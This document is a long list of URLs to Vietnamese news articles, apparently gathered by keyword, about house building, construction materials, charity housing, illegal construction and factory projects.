http://hatinh24h.com.vn/tp-ha-tinh-xe-cho-vat-lieu-xay-dung-lam-hong-duong-a2618.html
http://baoyenbai.com.vn/13/45592/12_trieu_USD_xay_nha_chong_bao_lu_cho_nguoi_ngheo.aspx
http://baoyenbai.com.vn/18/64983/Trung_Quoc_se_xay_nha_may_dien_hat_nhan_gan_Viet_Nam.aspx
http://thanhnienviet.vn/2019/10/24/nguoi-nhat-xay-nha-ong-30m2-gon-xinh-ma-van-thoang-dang/
https://reatimes.vn/phat-trien-vat-lieu-xay-dung-ben-vung-khoa-hoc-cong-nghe-phai-di-truoc-1607660355639.html
https://reatimes.vn/dat-xay-nha-o-cho-cong-nhan-ai-huong-loi-36391.html
http://baolangson.vn/xa-hoi/37701-dak-nong-dau-tu-150-ty-dong-xay-nha-tang-dong-bao-dan-toc-thieu-so-ngheo.html
http://baoquangtri.vn/Ban-doc-phap-luat/modid/422/ItemID/104793/title/De-nghi-truy-to-can-bo-phuong-bao-ke-xay-nha-trai-phep-
https://baodansinh.vn/thanh-hoa-xay-nha-may-xu-ly-rac-thai-gan-650-ty-dong-44671.htm
https://reatimes.vn/thi-truong-bat-dong-san-kem-soi-dong-gia-vat-lieu-xay-dung-cuoi-nam-the-nao-20190923160936837.html
http://thanhnienviet.vn/2021/02/16/porsche-khong-co-y-dinh-xay-nha-may-hay-lap-rap-o-to-o-trung-quoc-vi-khach-muon-xe-san-xuat-tai-duc/
https://baodansinh.vn/cong-ty-dien-luc-ha-tinh-xay-nha-tinh-nghia-tang-me-viet-nam-anh-hung-66632.htm
https://reatimes.vn/tphcm-thao-do-cac-thuy-dai-de-xay-nha-giu-xe-cao-tang-8802.html
https://reatimes.vn/that-bai-cua-nguoi-dan-ba-xay-nha-4899.html
https://www.bienphong.com.vn/ho-tro-30-trieu-dong-xay-nha-o-cho-ho-giao-dan-o-vinh-an-post17954.html
http://baobinhduong.vn/doi-bong-chuyen-vat-lieu-xay-dung-binh-duong-thang-hang-doi-manh-2019-chien-thang-cua-long-qua-cam-a190578.html
http://baoquangtri.vn/Xa-hoi/modid/420/ItemID/17175/title/Xay-nha-cho-sinh-vien-Kien-nghi-dau-tu-tiep-4800-ty-dong
http://nghean24h.vn/chia-nhau-3000-ty-ca-lang-xay-nha-lau-sam-o-to-a513114.html
https://baodongkhoi.vn/cuu-chien-binh-duong-van-an-ho-tro-xay-nha-nghia-tinh-dong-doi-05072012-a24638.html
http://thanhnienviet.vn/2020/10/23/ai-noi-me-don-than-thi-khong-the-xay-nha-tien-ty/
http://baoyenbai.com.vn/12/157601/Mitsubishi_Motors_se_xay_nha_may_san_xuat_oto_thu_hai_tai_Viet_Nam.aspx
http://vinh24h.vn/nghe-an-chi-dao-xu-ly-su-dung-tro-xi-thach-cao-lam-vat-lieu-xay-dung-a136830.html
http://hatinh24h.com.vn/xay-nha-ong-2-tang-3-phong-ngu-hien-dai-sang-trong-chang-bao-gio-loi-mot-gia-chua-toi-400-trieu-a74422.html
http://nguoilambao.vn/hau-covid-19-nganh-vat-lieu-xay-dung-vuot-kho-de-phuc-hoi-n18613.html
https://baodansinh.vn/ninh-binh-xay-nha-mai-am-tinh-thuong-nha-nhan-ai-cho-hoi-vien-hoi-phu-nu-20191018141229422.htm
https://www.bienphong.com.vn/khoi-cong-xay-nha-dai-doan-ket-cho-phu-nu-ngheo-don-than-post437603.html
http://baoyenbai.com.vn/12/69191/Nhat_Ban_se_xay_nha_may_loc_dau_lon_nhat_Viet_Nam__.aspx
https://reatimes.vn/don-doc-chuyen-muc-dan-ong-xay-nha-cung-anh-chanh-van-hoang-anh-tu-3991.html
https://tieudungplus.vn/vat-lieu-xay-dung-sinh-hoc-doi-song-xanh-kinh-te-vung-31657.html
https://reatimes.vn/chai-nhua-bo-di-tro-thanh-gach-xay-nha-19904.html
http://baobinhduong.vn/xay-nha-sai-vi-tri-dat-keo-theo-nhieu-he-luy--a233765.html
https://baodansinh.vn/mat-2-nam-de-tiet-kiem-19-ty-de-mua-dat-xay-nha-vo-chong-tre-da-thuc-hien-giac-mo-voi-ngoi-nha-nho-xinh-2220205722311397.htm
http://baoquangtri.vn/Thoi-su/modid/445/ItemID/57030/title/Trieu-Phong-Phat-trien-manh-nganh-san-xuat-khai-thac-vat-lieu-xay-dung-
https://baodansinh.vn/hoang-mainghe-an-thi-nhau-xay-nha-cho-boi-thuong-15435.htm
https://reatimes.vn/khong-co-vat-lieu-xay-dung-than-thien-thi-khong-the-co-cong-trinh-xanh-8241.html
https://reatimes.vn/tuoi-nao-xay-nha-phat-tai-nhat-nam-dinh-dau-2017-3883.html
http://baobinhduong.vn/trung-tam-nhan-dao-que-huong-khoi-cong-xay-nha-o-va-truong-tieu-hoc-a74401.html
https://www.bienphong.com.vn/don-bien-phong-tri-le-khoi-cong-xay-nha-moi-cho-tre-mo-coi-post315209.html
http://baolangson.vn/chinh-tri/15173-tong-bi-thu-chu-tich-nuoc-lao-chum-ma-ly-xay-nha-xon-tiep-doan-dai-bieu-dang-ta.html
https://reatimes.vn/binh-duong-xay-nha-o-xa-hoi-100-200-trieu-can-the-nao-400031.html
https://baodansinh.vn/ha-tinh-vietinbank-ho-tro-xay-nha-tinh-nghia-cho-nguoi-gia-don-than-kho-khan-20200524081548528.htm
https://baotayninh.vn/dat-nao-vet-kenh-tieu-bau-coi-se-duoc-dung-lam-vat-lieu-xay-dung-a3501.html
https://reatimes.vn/doanh-nghiep-go-roi-diem-nghen-trong-bai-toan-xay-nha-o-xa-hoi-25265.html
http://thanhnienviet.vn/2020/07/01/vo-chong-tre-xay-nha-3-tang-chuan-sang-xin-min-voi-chi-phi-bat-ngo/
https://reatimes.vn/trung-quoc-xay-nha-ve-sinh-bang-kinh-trong-suot-de-du-khach-tien-ngam-canh-1365.html
http://thanhhoa24h.net.vn/yen-thanh-nghe-an-ngang-nhien-chiem-duong-trong-cay-xay-nha-a20612.html
https://reatimes.vn/thi-truong-vat-lieu-xay-dung-san-sang-de-vuon-ra-the-gioi-31939.html
http://thanhnienviet.vn/2019/11/23/xay-nha-nhat-dinh-phai-biet-ro-nhung-loai-mong-co-ban-sau/
http://tintucmientay.com.vn/tien-giang-de-nghi-lam-ro-vu-xay-nha-tinh-thuong-nhieu-khuat-tat-a119478.html
http://nghean24h.vn/bo-het-cac-thiet-bi-chong-trom-di-chi-can-hoc-cach-xay-nha-chong-trom-cuc-hieu-qua-nay-cua-nguoi-nhat-a482524.html
https://reatimes.vn/han-quoc-xay-nha-may-san-xuat-dong-co-may-bay-o-hoa-lac-15049.html
https://giaoducthoidai.vn/ket-noi/dak-nong-co-giao-vung-cao-xin-com-xay-nha-ban-tru-cho-hoc-tro-ngheo-3787617.html
http://antt.vn/de-xuat-khong-duoc-dung-dat-san-golf-de-xay-nha-ban-259203.htm
http://antt.vn/cu-tri-de-nghi-ha-noi-xu-tinh-trang-lo-xay-nha-de-ban-bo-quen-truong-hoc-295242.htm
https://baodansinh.vn/cao-bang-xe-tai-cho-vat-lieu-xay-dung-bat-ngo-lat-chan-ngang-quoc-lo-giao-thong-te-liet-hoan-toan-2019110212193139.htm
http://nghean24h.vn/chu-nha-phai-khau-chuc-mui-vi-vo-kinh-cuong-luc-nha-tam-a486988.html
https://tieudungplus.vn/vi-pham-ve-san-xuat-vat-lieu-xay-dung-co-su-dung-amiang-trang-phat-den-90-trieu-dong-22191.html
https://baoquangbinh.vn/goc-thu-gian/202007/nhiep-anh-gia-xay-nha-gan-ong-kinh-dat-ten-con-theo-cac-hang-may-anh-2179301/
http://baolangson.vn/xa-hoi/34004-cho-phep-ap-dung-chinh-sach-uu-dai-doi-voi-du-an-xay-nha-tang-le-tren-dia-ban-ha-noi.html
https://reatimes.vn/tap-doan-tt-xay-nha-may-xu-ly-chat-thai-nghin-ty-tai-thai-nguyen-20190923163904056.html
https://reatimes.vn/vingroup-se-xay-nha-sieu-re-200-trieu-dong-26261.html
http://baoquangtri.vn/Ban-doc-phap-luat/modid/422/ItemID/147333/title/Tang-cuong-xu-ly-cac-xe-cho-vat-lieu-xay-dung-vi-pham
https://baodansinh.vn/xay-nha-mai-am-cong-doan-cho-giao-vien-co-hoan-canh-kho-khan-20190911062601.htm
http://nghean24h.vn/da-co-kinh-cuong-luc-gorilla-glass-the-he-5-sieu-ben-a414979.html
https://www.bienphong.com.vn/don-bien-phong-cua-khau-quoc-te-la-lay-khoi-cong-xay-nha-nghia-tinh-bien-gioi-post297115.html
http://baoquangtri.vn/Thoi-su/modid/445/ItemID/152087?title=Gan-600-trieu-dong-trao-qua-ho-tro-xay-nha-tinh-thuong-cho-nguoi-dan-vung-kho-bi-anh-huong-do-COVID-%E2%80%93-19
http://baoyenbai.com.vn/18/133028/Nhat_Ban_xay_nha_may_dien_mat_troi_noi_lon_nhat_the_gioi.aspx
http://baobinhduong.vn/van-dong-ung-ho-xay-nha-dai-doan-ket-tren-huyen-dao-truong-sa-a178061.html
http://baolangson.vn/giao-duc/162097-nam-hoc-moi-can-quan-tam-dau-tu-xay-nha-ve-sinh-trong-truong-hoc.html
http://antt.vn/mua-dat-du-an-duoc-phe-duyet-20-nam-van-khong-the-xay-nha-295059.htm
https://baodansinh.vn/thua-thien-hue-tiep-nhan-500-trieu-dong-ho-tro-xay-nha-chong-lu-cho-nguoi-dan-20201116151624235.htm
https://baodansinh.vn/nghe-an-xay-nha-tinh-nghia-tham-tinh-quan-dan-20200828114620783.htm
https://nguoidothi.net.vn/tp-hcm-siet-chat-du-an-xay-nha-cao-tang-trong-khu-trung-tam-nen-trien-khai-som-25452.html
https://reatimes.vn/chi-so-vi-mo-thang-12-2018-cpi-nha-o-va-vat-lieu-xay-dung-giam-089-32530.html
http://baobinhduong.vn/so-xay-dung-trien-khai-quy-chuan-quoc-gia-ve-san-pham-hang-hoa-vat-lieu-xay-dung-a120125.html
http://thanhnienviet.vn/2021/01/13/gia-chu-soc-trang-xay-nha-ong-de-chiu-nhu-resort-tren-manh-dat-vua-hep-vua-dai/
https://baothuathienhue.vn/bao-hiem-xa-hoi-viet-nam-xay-nha-tinh-nghia-a29533.html
https://reatimes.vn/thi-truong-vat-lieu-xay-dung-nhan-tin-hieu-moi-dau-quy-ii-24059.html
http://thanhhoa24h.net.vn/16-nam-nuoi-uoc-nguyen-xay-nha-tho-to-cua-hoai-linh-a42047.html
http://baobinhduong.vn/phe-duyet-chien-luoc-phat-trien-vat-lieu-xay-dung-a229624.html
https://baodansinh.vn/vat-lieu-xay-dung-an-toan-than-thien-voi-moi-truong-va-xu-huong-su-dung-2020070209554358.htm
https://baodansinh.vn/san-khau-tu-te-khong-the-xay-nha-tu-noc-57457.htm
https://reatimes.vn/da-nang-xay-nha-chong-bao-cho-phu-nu-ngheo-7434.html
http://baolangson.vn/quoc-te/113222-israel-tiep-tuc-cap-phep-xay-nha-dinh-cu-tai-dong-jerusalem.html
https://baotuyenquang.com.vn/kinh-te/cong-nghiep-ha-tang/giam-dien-tich-khu-cong-nghiep-trang-due-de-xay-nha-o-cho-cong-nhan-76192.html
http://thanhnienviet.vn/2020/05/16/cach-xay-nha-tiet-kiem-chi-phi-nhat-5-kinh-nghiem-khong-phai-ai-cung-biet/
http://hatinh24h.com.vn/ha-tinh-ho-bien-hanh-lang-quoc-lo-thanh-bai-tap-ket-vat-lieu-xay-dung-a8566.html
https://nguoidothi.net.vn/tp-hcm-phan-cap-xu-ly-cac-truong-hop-lan-chiem-kenh-rach-xay-nha-o-cong-trinh-22231.html
http://danang24h.vn/da-nang-via-he-tuyen-kenh-bac-son-bien-thanh-bai-tap-ket-vat-lieu-xay-dung-a113041.html
https://nguoidothi.net.vn/tp-hcm-nghien-cuu-khong-cap-phep-xay-nha-rieng-le-9301.html
http://nghean24h.vn/nghe-an-chi-dao-xu-ly-su-dung-tro-xi-thach-cao-lam-vat-lieu-xay-dung-a587711.html
http://nguoihanoi.com.vn/da-nang-siet-xay-nha-cao-tang-tai-khu-vuc-trung-tam_247049.html
https://baotayninh.vn/vu-xay-nha-lan-hem-cong-cong-xin-hop-thuc-hoa-vi-sao-cac-co-quan-quan-ly-trat-tu-do-thi-chua-kien-quyet-xu-ly-a41833.html
https://baodansinh.vn/thanh-hoa-trao-tang-xe-lan-cho-cac-chau-bai-nao-va-ho-tro-xay-nha-59884.htm
http://hatinh24h.com.vn/geleximco-muon-xay-nha-may-nhiet-dien-ty-usd-voi-doi-tac-trung-quoc-a93858.html
http://baobinhduong.vn/dau-gia-quyen-khai-thac-khoang-san-lam-vat-lieu-xay-dung-thong-thuong-a194512.html
http://baoquangtri.vn/Ban-doc-phap-luat/modid/422/ItemID/146249/title/Hoi-am-vu-xay-nha-tren-duong-giao-thong-o-thon-Tra-Loc-xa-Hai-Xuan-huyen-Hai-Lang-Da-thao-do-phan-nha-xay-dung-tren-duong-giao-thong
https://baodansinh.vn/la-lung-chuyen-xay-nha-tro-de-nuoi-ga-o-nghe-an-36672.htm
http://baolangson.vn/chinh-tri/8405-thao-go-vuong-mac-trong-xay-nha-o-cho-nguoi-ngheo-tai-an-giang.html
https://tieudungplus.vn/dat-nuoi-trong-thuy-san-bien-thanh-bai-tap-ket-vat-lieu-xay-dung-38654.html
https://giaoducthoidai.vn/khoa-hoc/vat-lieu-xay-dung-lam-gia-tang-o-nhiem-khong-khi-3829981.html
http://baolangson.vn/xa-hoi/29377-tu-nam-2011-su-dung-gach-khong-nung-loai-nhe-de-xay-nha-cao-tang.html
http://baoyenbai.com.vn/18/128667/Ukraine_huy_bo_thoa_thuan_xay_nha_may_dien_hat_nhan_voi_Nga.aspx
http://baolangson.vn/xa-hoi/37271-ha-noi-day-manh-xay-nha-cho-cong-nhan-sinh-vien.html
http://thanhnienviet.vn/2020/10/14/tp-hcm-tiep-tuc-han-che-xay-nha-cao-tang-tai-quan-1-quan-3/
http://baobinhduong.vn/doi-bong-chuyen-vat-lieu-xay-dung-binh-duong-thanh-cong-den-tu-gian-kho-a214943.html
https://giaoducthoidai.vn/phap-luat/ha-noi-ke-sat-hai-ba-chu-cua-hang-vat-lieu-xay-dung-roi-nem-xac-ngoai-bai-rac-khai-gi--3799072.html
https://giaoducthoidai.vn/van-hoa/vu-hoang-viet-xay-nha-pho-10-ty-dat-vang-bat-ngo-nam-o-tren-tang-thuong-3802736.html
http://thanhhoa24h.net.vn/du-an-gach-khong-nung-bien-thanh-bai-tap-ket-vat-lieu-xay-dung-a142686.html
https://giaoducthoidai.vn/phap-luat/hieu-truong-lan-chiem-dat-hang-tram-m2-duong-dan-sinh-xay-nha-chinh-quyen-bat-luc--3825793.html
http://thanhnienviet.vn/2020/05/06/ban-hanh-quy-chuan-xay-nha-tro-tai-tp-hcm/
https://reatimes.vn/kho-khan-bua-vay-doanh-nghiep-vat-lieu-xay-dung-20200401092747080.html
http://baobinhduong.vn/xay-nha-dai-doan-ket-cho-nguoi-ngheo-tiep-them-dong-luc-de-nguoi-ngheo-vuon-len-a233143.html
http://nghean24h.vn/tu-van-xay-nha-hai-tang-60m2-kinh-phi-598-trieu-dong-a511745.html
https://baotayninh.vn/xay-nha-khong-dung-hop-dong-bi-kien-ra-toa-a43230.html
https://baoangiang.com.vn/cho-moi-hop-mat-chuc-sac-chuc-viec-cac-ton-giao-dan-toc-cac-doi-xay-nha-thi-cong-cau-duong-a294940.html
http://hatinh24h.com.vn/kinh-hoang-canh-kinh-cuong-luc-phat-no-gam-day-nguoi-nhu-dan-hoa-cai-a68345.html
http://thanhhoa24h.net.vn/dap-mai-khong-vo-kinh-cuong-luc-2-ten-cuop-tuc-dien-a397.html
https://baodansinh.vn/dan-ba-vua-xay-nha-vua-xay-to-am-17072.htm
http://antt.vn/dung-xay-nha-hat-hoa-sen-lon-nhat-thu-do-239654.htm
http://baobinhduong.vn/doi-bong-chuyen-vat-lieu-xay-dung-binh-duong-giac-mo-viet-tiep-cau-chuyen-co-tich-a222853.html
https://reatimes.vn/vi-pham-ve-san-xuat-vat-lieu-xay-dung-co-su-dung-amiang-trang-phat-den-90-trieu-dong-19062.html
https://nguoidothi.net.vn/muon-xay-nha-tren-dat-nong-nghiep-phai-lam-sao-7763.html
http://thanhhoa24h.net.vn/viet-nam-xay-nha-may-dien-hat-nhan-10-nam-nua-cung-khong-co-a161158.html
https://reatimes.vn/lieu-donald-trump-co-phat-trien-nganh-vat-lieu-xay-dung-my-nhu-da-hua-2893.html
http://thanhnienviet.vn/2021/03/04/bo-tui-kinh-nghiem-mua-dat-tho-cu-xay-nha-o/
https://baothuathienhue.vn/ke-hoach-xay-nha-o-xa-hoi-cho-cong-nhan-moi-chi-dat-hon-40--a95006.html
http://baoyenbai.com.vn/16/83048/Khai_quat_khao_co_hoc_xu_ly_di_doi_di_tich_di_vat_khu_vuc_xay_Nha_Quoc_hoi__.aspx
https://nguoidothi.net.vn/xay-nha-o-tren-dat-nguoi-khac-co-duoc-cap-so-do-26662.html
http://nghean24h.vn/mac-ho-henh-lo-vong-1-hoi-chi-em-nhan-du-gach-xay-nha-a613027.html
http://hoinhabaovietnam.vn/Da-Nang-Dau-tu-8000-ti-dong-xay-nha-o-xa-hoi-cho-NLD-kho-khan_n73180.html
http://antt.vn/thanh-hoa-bat-thuong-vu-xay-nha-may-nuoc-sach-ngoai-quy-hoach-24652.htm
http://baobinhduong.vn/vat-lieu-xay-dung-binh-duong-tru-hang-thanh-cong-a236961.html
http://baolangson.vn/kinh-te/62998-xay-nha-may-san-xuat-amon-nitrat-tai-thai-binh.html
http://thanhnienviet.vn/2020/06/27/5-nam-tich-tien-mua-dat-doi-10-nam-van-khong-duoc-phep-xay-nha/
https://baodansinh.vn/hdbank-ho-tro-xay-nha-cho-ho-ngheo-mien-nui-quang-ninh-20191005161128425.htm
https://baotuyenquang.com.vn/xa-hoi/cuoc-song/yen-son-chung-tay-xay-nha-dai-doan-ket-138122.html
https://www.bienphong.com.vn/bdbp-ho-tro-xay-nha-cho-ho-ngheo-o-cac-xa-bien-gioi-post342081.html
https://baodansinh.vn/nghe-an-phat-hien-qua-bom-270-kg-khi-dao-mong-xay-nha-74125.htm
http://baolangson.vn/xa-hoi/39068-43-300-ho-ngheo-tay-nguyen-duoc-ho-tro-xay-nha-moi.html
http://nghean24h.vn/vu-chay-14-nguoi-chet-lo-dien-ong-chu-dai-gia-xay-nha-khap-sai-gon-a517875.html
https://baothuathienhue.vn/corning-ra-mat-kinh-cuong-luc-cho-may-tinh-bang-va-tv-a72098.html
http://antt.vn/de-xay-ra-xay-nha-trai-phep-hang-loat-bi-thu-chu-tich-o-nghe-an-bi-ky-luat-309646.htm
http://baoyenbai.com.vn/12/88633/Cam_xuat_khau_8_loai_khoang_san_lam_vat_lieu_xay_dung.aspx
http://nghean24h.vn/vi-sao-ca-ngan-ho-dan-tu-choi-nhan-ho-tro-xay-nha-tranh-lu-a442434.html
https://baolongan.vn/viet-nam-cuba-huong-toi-lien-doanh-san-xuat-vat-lieu-xay-dung-a20238.html
http://antt.vn/dai-gia-xay-nha-40-ti-cho-sinh-vien-tang-xe-camry-con-minh-chay-xe-may-cui-bap-8564.htm
https://baodansinh.vn/thanh-hoa-khoi-cong-xay-nha-khan-quang-do-cho-hoc-sinh-mo-coi-20200325163628975.htm
http://baoquangtri.vn/Kinh-te/modid/419/ItemID/95560/title/Huy-dong-moi-nguon-luc-de-giup-ho-ngheo-xay-nha-phong-tranh-bao-lu
https://daklak24h.com.vn/xa-hoi/23431/khoi-cong-xay-nha-tang-ho-ngheo.html
https://baolongan.vn/gan-1-5-ti-dong-xay-nha-tinh-nghia-tinh-thuong-a9709.html
http://baolangson.vn/quoc-te/110577-israel-thuc-day-cac-ke-hoach-xay-nha-dinh-cu-tai-jerusalem.html
https://reatimes.vn/cach-phu-nu-thong-minh-tham-gia-vao-viec-xay-nha-de-thuan-vo-thuan-chong-7112.html
https://nguoidothi.net.vn/tp-hcm-chan-chinh-nan-bao-ke-chia-lo-ban-nen-xay-nha-khong-phep-tren-dat-nong-nghiep-23847.html
https://tieudungplus.vn/tphcm-de-xuat-xay-nha-hat-giao-huong-hon-1500-ty-tai-thu-thiem-28565.html
http://nghean24h.vn/gan-10-nam-toi-di-xe-buyt-de-danh-tien-mua-dat-xay-nha-a487143.html
http://thanhnienviet.vn/2017/07/06/luong-3-4-trieu-ma-xay-nha-lau-di-xe-hoi-du-luan-nghi-ngo-la-dung/
https://baothuathienhue.vn/siet-chat-kiem-tra-o-to-cho-vat-lieu-xay-dung-a84346.html
https://baodansinh.vn/hon-800-ty-dong-xay-nha-may-dien-mat-troi-thanh-hoa-57669.htm
https://baotayninh.vn/tan-chau-khoi-cong-xay-nha-cong-vu-cho-giao-vien-mam-non-a8834.html
http://hatinh24h.com.vn/xay-nha-moi-sang-xin-nhu-trung-tam-giai-tri-viet-anh-giau-co-nao-a144663.html
http://baoyenbai.com.vn/12/41212/Dieu_chinh_gia_va_hop_dong_xay_dung_do_bien_dong_gia_nguyen_lieu_nhien_lieu_va_vat_lieu_xay_dung.aspx
https://tieudungplus.vn/xay-nha-moi-can-tuan-thu-nguyen-tac-phong-thuy-nao-11704.html
http://baoyenbai.com.vn/227/46636/Long_ga_co_the_lam_vat_lieu_xay_dung.aspx
http://thanhhoa24h.net.vn/hieu-truong-len-lut-xay-nha-tren-dat-cong-vao-ban-dem-a109815.html
https://reatimes.vn/muc-boi-thuong-khi-xay-nha-lam-anh-huong-den-hang-xom-1430.html
https://reatimes.vn/chi-so-gia-tieu-dung-nha-o-va-vat-lieu-xay-dung-tang-034-trong-thang-5-25525.html
https://baoangiang.com.vn/bidv-ho-tro-tren-10-ty-dong-xay-nha-truong-hoc-va-tang-qua-tet-cho-nguoi-dan-an-giang-a217198.html
https://baothuathienhue.vn/xu-phat-cong-ty-co-phan-vat-lieu-xay-dung-huong-ho-90-trieu-dong-a91683.html
http://baobinhduong.vn/khai-truong-phong-giao-dich-bao-loc-acb-tang-100-trieu-dong-xay-nha-tinh-thuong-a29270.html
https://daklak24h.com.vn/xa-hoi/8117/chi-bo-cong-ty-co-phan-vat-lieu-xay-dung-20-vung-vang-trong-gian-kho.html
https://baothuathienhue.vn/huong-tra-xay-nha-tinh-thuong-cho-hoi-vien-nong-dan-co-hoan-canh-kho-khan-a70792.html
https://baodansinh.vn/2-3-ty-dong-xay-nha-noi-tru-cho-hoc-sinh-truong-thcs-xa-thuan-mang-ngan-son-bac-can-12093.htm
http://thanhnienviet.vn/2020/07/01/da-nang-so-noi-vu-de-nghi-thu-hoi-cong-van-dung-cap-phep-xay-nha-o-ket-hop-thuong-mai-dich-vu/
http://hatinh24h.com.vn/huong-son-vat-lieu-xay-dung-tan-cong-truong-hoc-a7665.html
http://antt.vn/dau-gia-mo-vat-lieu-xay-dung-o-ha-tinh-tu-lenh-nganh-ly-giai-nguyen-nhan-cham-tre-304856.htm
https://reatimes.vn/ban-tin-bds-24h-dung-co-che-dat-hang-xay-nha-o-thuong-mai-1608970442871.html
https://baodansinh.vn/hon-17000-ho-ngheo-khu-vuc-mien-trung-duoc-ho-tro-xay-nha-tranh-bao-lu-96876.htm
https://baodongkhoi.vn/gop-cong-xay-nha-cho-thuong-binh-07112010-a9695.html
http://hatinh24h.com.vn/doanh-nghiep-lan-bien-xay-nha-hang-trai-phep-tai-ha-tinh-sai-pham-cong-khai-xu-ly-i-ach-a102148.html
http://baoyenbai.com.vn/11/57934/Khoi_cong_xay_Nha_Quoc_hoi.aspx
http://nguoihanoi.com.vn/vi-sao-dan-bac-lieu-dua-xay-nha-lau-nuoi-chim-yen-giua-tp_236799.html
https://daklak24h.com.vn/tin-kinh-te/45123/quan-ly-do-thi-xay-nha-nuoi-chim-yen-trong-do-thi-co-quan-chuc-nang-lung-tung.html
http://baobinhduong.vn/tuot-thang-may-van-chuyen-vat-lieu-xay-dung-mot-cong-nhan-nguy-kich-a104020.html
https://reatimes.vn/nganh-vat-lieu-xay-dung-2019-buc-tranh-nhieu-sac-mau-32331.html
https://baodansinh.vn/geleximco-muon-xay-nha-may-nhiet-dien-ty-usd-voi-doi-tac-trung-quoc-71927.htm
https://www.bienphong.com.vn/khanh-thanh-xay-nha-chong-lu-tai-thanh-hoa-post19757.html
https://reatimes.vn/tphcm-trong-2-nam-toi-se-khong-xay-nha-cao-tang-tai-quan-1-va-quan-3-26786.html
https://daklak24h.com.vn/xa-hoi/27397/huyen-krong-pac-no-luc-hoan-thanh-chi-tieu-xay-nha-167.html
https://reatimes.vn/bat-dong-san-24h-tphcm-hoc-tap-binh-duong-xay-nha-cho-cong-nhan-gia-100-trieu-dong-1691.html
https://baodansinh.vn/ca-si-thuy-tien-se-xay-nha-cong-dong-tranh-lu-mua-thuyen-cuu-ho-trong-nha-cho-ca-thon-20201025095002174.htm
http://thanhhoa24h.net.vn/nguoi-dan-khanh-hoa-xay-nha-nuoi-ong-du-tranh-bao-a96418.html
http://baoyenbai.com.vn/12/97288/Bo_quy_dinh_cam_xay_nha_nhai_kien_truc_kieu_Phap.aspx
https://reatimes.vn/go-kho-the-nao-cho-vat-lieu-xay-dung-xanh-27929.html
https://giaoducthoidai.vn/phap-luat/gia-dinh-can-bo-quan-thu-duc-tphcm-xay-nha-trai-phep-xu-ly-nghiem-khong-co-vung-cam-3826807.html
https://baodansinh.vn/ubnd-tp-hue-dat-da-duyet-du-an-van-cap-phep-cho-nguoi-dan-xay-nha-44714.htm
http://baolangson.vn/xa-hoi/45134-xay-nha-trai-phep-trong-chua-quan-am-tu-quang-binh.html
https://baoquangbinh.vn/kinh-te/202103/toan-tinh-hien-co-72-doanh-nghiep-san-xuat-vat-lieu-xay-dung-2186386/
http://baobinhduong.vn/doi-bong-chuyen-vat-lieu-xay-dung-binh-duong-dat-chi-tieu-tru-hang-doi-manh-2019-a194576.html
http://thanhnienviet.vn/2020/09/22/tong-hop-kinh-nghiem-chon-vat-lieu-xay-nha-ben-chac-tiet-kiem-chi-phi/
https://baotayninh.vn/can-quan-ly-nghiem-viec-xay-nha-nuoi-chim-yen-a124741.html
https://reatimes.vn/doanh-nghiep-co-von-nuoc-ngoai-thue-dat-xay-nha-co-duoc-phep-ban-360.html
https://baodansinh.vn/ubnd-phuong-van-quan-chiem-dat-xay-nha-van-hoa-42916.htm
https://reatimes.vn/san-xuat-vat-lieu-xay-dung-khong-nung-tu-tro-xi-can-be-do-chinh-sach-26794.html
https://baotayninh.vn/siet-chat-viec-cap-giay-phep-xay-nha-tam-a51937.html
http://baoyenbai.com.vn/17/114796/Tu_19_xay_nha_tu_7_tang_phai_bao_cao_So_Xay_dung.aspx
http://baolangson.vn/quoc-te/99714-nga-giup-viet-nam-xay-nha-may-dien-hat-nhan.html
https://baodongkhoi.vn/be-mac-giai-bong-chuyen-bai-cat-tinh-ben-tre-tranh-cup-vat-lieu-xay-dung-lan-thu-iii-nam-2011-01062011-a4044.html
http://nghean24h.vn/cam-tien-theo-trai-vao-nghe-an-xay-nha-vo-ho-ra-di-tay-trang-con-bi-bat-chiu-tien-an-hoi-de-gat-no-a570184.html
https://tieudungplus.vn/ban-tin-bds-24h-dung-co-che-dat-hang-xay-nha-o-thuong-mai-1608970442871.html
http://baoyenbai.com.vn/18/115231/LHQ_de_xuat_giam_sat_nhap_khau_vat_lieu_xay_dung_vao_Gaza.aspx
https://reatimes.vn/hoa-chat-nano-duoc-su-dung-trong-chong-chay-cho-vat-lieu-xay-dung-1606296818126.html
http://nghean24h.vn/nghe-an-chinh-quyen-lam-ngo-truoc-tinh-trang-xay-nha-kien-co-tren-dat-ven-bien-a537136.html
https://www.bienphong.com.vn/len-lut-xay-nha-cho-du-an-tiem-an-nguy-co-mat-an-ninh-trat-tu-post338349.html
http://thanhhoa24h.net.vn/tphcm-muon-xay-nha-hat-1500-ty-chua-nen-voi-a129984.html
https://baotuyenquang.com.vn/kinh-te/cong-nghiep-ha-tang/san-xuat-vat-lieu-xay-dung-giai-doan-2015-2020!-62777.html
http://thanhnienviet.vn/2021/02/22/gia-chu-soc-trang-xay-nha-de-chiu-nhu-resort-tren-manh-dat-vua-hep-vua-dai/
http://antt.vn/cap-so-do-xay-nha-tren-cong-thoat-nuoc-298173.htm
http://danang24h.vn/da-co-kinh-cuong-luc-gorilla-glass-the-he-5-sieu-ben-a72522.html
https://reatimes.vn/doanh-nghiep-vat-lieu-xay-dung-ong-lon-di-lui-27558.html
https://baodansinh.vn/vingroup-sap-xay-nha-may-duoc-pham-tai-bac-ninh-72134.htm
https://baolongan.vn/trao-tang-tien-xay-nha-tinh-thuong-cho-cuu-chien-binh-a40407.html
https://baothuathienhue.vn/vat-lieu-xay-dung-dan-dau-bang-xep-hang-tang-truong-pmi-nganh-cua-chau-a-a60174.html
https://baotayninh.vn/1-000-ty-dong-xay-nha-lam-viec-cac-co-quan-quoc-hoi-a19983.html
http://danang24h.vn/hai-nguoi-bi-vat-lieu-xay-dung-de-chet-thuong-tam-a120942.html
http://hatinh24h.com.vn/xay-nha-sieu-cao-tang-se-de-bep-nha-phap-co-ga-ha-noi-a74510.html
http://baoquangtri.vn/Thoi-su/modid/445/ItemID/74514/title/Bao-Thanh-Nien-xay-nha-nhan-ai-va-cuu-tro-tai-Quang-Tri-
http://baoquangtri.vn/Van-hoa-The-thao/modid/421/ItemID/106700/title/Lang-hai-mo-hoi-xay-nha-cho-dan-ngheo-
https://baotuyenquang.com.vn/phong-su/hien-dat-xay-nha-van-hoa-o-khuon-ha-87580.html
https://baolongan.vn/van-dong-ung-ho-xay-nha-dai-doan-ket-tren-huyen-dao-truong-sa-a52996.html
https://www.bienphong.com.vn/don-bp-ckqt-cau-treo-xay-nha-huu-nghi-cho-ho-ngheo-tai-lao-post3360.html
https://reatimes.vn/xay-nha-moi-can-tuan-thu-nguyen-tac-phong-thuy-nao-198.html
